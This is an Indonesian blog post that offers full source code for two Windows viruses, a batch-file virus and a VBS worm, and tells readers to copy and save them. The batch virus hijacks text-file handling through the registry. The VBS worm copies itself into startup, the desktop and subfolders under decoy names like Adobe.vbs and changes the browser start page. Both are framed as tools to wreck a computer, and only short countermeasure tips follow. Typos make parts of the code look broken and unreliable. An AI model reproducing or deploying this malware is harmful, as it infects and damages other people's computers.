Postingan
PEMOGRAMAN VIRUS DAN SPYWARE
Pembuatan Virus File Bat
Secara singkat saja akan kami berikan formulanya, kalo lihat tulisannya sudah gag mud, mendingan langsung cop-past aja.....
Isi file script bat virus tersebut adalah sebagai berikut :
@Echo off
if not Exist C:\DOCUME~1\ALLUSE~1\DOCUME~1\Readme.bat Copy %0 C:\DOCUME~1\ALLUSE~1\DOCUME~1\Readme.bat >Null
ifnot Exist C:\DOCUME~1\ALLUSE~1STARM~1\Programs\Startup\pesan.wri Goto Pesan
Goto Infect
:pesan
Echo Halo, selamat datang di komputer yang telah saya kuasai >pesan.wri
Echo Jangan salahkan saya jika ini terjadi, tapi salahkan diri anda sendiri >>pesan.wri
Echo Lain waktu lebih waspada ya >>pesan.wri
Copy pesan.wri C:\DOCUME~1\ALLUSE~1STARTM~1\Programs\Starup\pesan.wri >Null
Echo Windows Registry Editor Version 5.00 >Infact.reg
Echo. >>Infect.reg
Echo [HKEY_CLASSES_ROOT\txtfile\shell\open\command] >>Infect.reg
Echo @=hex(2):43,00,3a,00,5c,00,44,006f,00,63,00,75,00,6d,00,65,00,6e,0074,00,73,\ >>Infect.reg
Echo 00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,\ >>Infect.reg
Echo 73,00,5c,00,41,00,6c,00,6c,00,20,00,55,00,73,00,65,00,72,00,73,00,5c,00,44,\ >>Infect.reg
Echo 00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,5c,00,52,00,65,00,61,00,\ >>Infect.reg
Echo 64,00,6d,00,65,00,2e,00,62,00,61,00,74,00,20,00,25,00,31,00,00,00 >>Infect.reg
Copy Infect.reg C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg >Null
C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg
@Del Infect.reg
@Del C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg
:Infect
Start %SystemRoot%\system32\NOTEPAD.EXE %1
Copy %0 %1.bat >Null
For %%A in (*.jpg) do type %0 >%%A.bat
@Dell null
Exit
Save hasil ketikan di atas pada notepad kemdian kalau ingin agar virus tersebut bisa bekerja pilih save as kemudian pada name file tambahkan .bat kemudian klick save,,,, silahkan tunggu kehancuran komputer anda...
Untuk menanggulangi virus tersebut cobalah lakukan cara berikut ini :
1. Cari file Command .com atau file cmd.exe dan rubah nama filenya .dijamin semua perintah Dos yang dimasukan dalam file batch akan error.
2. Hilangkan key registry yang menangani file batch, sebelumnya , backup terlebih dahulu data aslinya di registry. Cari alamat key HKEY_CLASSES_ROOT\batfile\shell\open\command. Eksport nilainya dan simpan sebagai file reg pada suatu tempat dan beri nama “EnableDos.reg”
Selanjutnya rubah nilai default terebut menjadi o sehingga bath file tidak bisa dijalankan. Jika ingin menjalankan kembali file bat kembali, impport file reg yang telah terbentuk sebelumnya.
3. Buat key baru di registry yang berfungsi untuk mendisablekan perintah DOS sehngga semua perintah DOS jika dijalankan dari windows akan diblok.
Catatan :
Berlaku untuk windows xp
Kalau di atas menggunakan format bat sedangkan selanjutnya saya juga akaan memberikan formula VBS,
Pembuatan Virus Vbs File
Isi scipt Vbs tersebut adalah segbagai berikut :
On error resume next
Dim WshShell, FSO, Induk, vPath, target, lokasi
Set WshShell = CreateObject("Wscript.Shell")
set FSO = CreatObject("Scripting.FileSystemObject")
set Induk = FSO.GetFile(Wscript.ScriptFullName)
WshShell.RegWrite "HKCU\Sofware\Microsof\Internet Explore\Main\Start Page","http://www.Jasakom.com/"
Lokasi = WshShell.SpecialFolders("Startup")
Induk.Copy (Lokasi & "\Adobe.vbs")
Lokasi = WshShell.specialFolder("Desktop")
Induk.Copy (Lokasi & "\Readme.vbs")
InfectFolder Lokasi
Lokasi = wshShell.specialFolders("MyDocuments")
Induk.Copy (Lokasi & "\Gambar.vbs")
InfectFolder Lokasi
vPath = Left(Induk, InStrRev(Induk, "\"))
For Each target in FSO.GetFolder(vPath).files
If Right(target,3)="txt" or Right(targrt,3)="jpg" then induk.Copy(target & ".vbs")
Next
Sub InfectFolder(alamat)
on error resume next
For Each target in FSO.GetFolder(alamat).SubFolders
Induk.copy(target & "\Readme.vbs")
WshShell.Run (target & "\Readme.vbs")
Next
End sub
Seperti pembuatan virus bath di atas , simpanlah pada note pad kemudia n jika ingi virus tersebut bekerja pada nama akhirnya beri .vbs dan faormatnya all file. Tunggu kehancuran komputer anda.
BAGAIMANA CARANYA SUPAYA KOMPUTER KITA TERHINDAR VIRUS JADUL DI ATAS??
Caranya gampang lakukan saja statment di bawah ini ,
Ada tindakan pencegahan yang harus Anda lakukan pada system computer, ssupayaanda tidak terserang virus VBs , yaitu di folser option dari windiows explore , pada tab file types, rubah program penghandle dri file VBS, misanya dengan note pad.
GOOD LUCK!!!
Tidak ada komentar:
Posting Komentar
komentar yuk bro....